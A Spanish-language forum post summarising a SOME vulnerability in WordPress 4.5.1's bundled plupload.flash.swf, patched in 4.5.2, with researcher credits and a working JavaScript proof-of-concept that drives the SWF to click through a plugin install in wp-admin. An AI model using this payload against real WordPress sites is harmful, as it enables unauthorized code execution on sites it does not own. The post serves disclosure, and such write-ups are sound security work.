WordPress SOME bug en plupload.flash.swf

Iniciado por arthusu, Mayo 13, 2016, 04:09:06 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Resumen rapido

* SOME en Wordpress 4.5.1
* Reportado a finales de abril
* Corregido en Wordpress 4.5.2

  Introduccion

Wordpress 4.5.1 es vulnerable de nuevo a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta vulnerabilidad que se deriva por un proceso de sanatizacion de una URL insegura en el archivo plupload.flash.swf. El codigo en el archivo intenta remover FlashVars en su caso para establecer los parametros por GET pero falla al hacer esto, habilitando XSS via No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

El ataque fue descrito por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. La vulnerabilidad en plupload.flash.swf fue descubierta en abril del 2016, primeramente identificada como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Entonces, despues el team lo reviso, la completa explotacion fue descubierta y analizada por Heiderich, Filedescriptor, Kinugawa and Inführ. Finalmente, es decubierto, que el archivo viene empaquetado en la ultima version de Wordpress y el problema fue reportado via HackerOne por Heiderich et al.

PoC Simple:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un PoC mas complejo fue creado para demostrar el ataque potencial Remote Code Execution (RCE) de esta vulnerabilidad. Una descripcion detallada puede ser encontrada mas abajo:

Código: php
<button onclick="fire()">Click</button> <script> function fire() {  open('javascript:setTimeout("location=\'http://example.com/wp-includes/js/plupload/plupload.flash.swf?target%g=opener.document.body.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.click&uid%g=hello&\'", 2000)');   setTimeout('location="http://example.com/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-super-cache&TB_iframe=true&width=600&height=550"') } </script>


Para ver la explicacion a profundidad y el post original:
  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta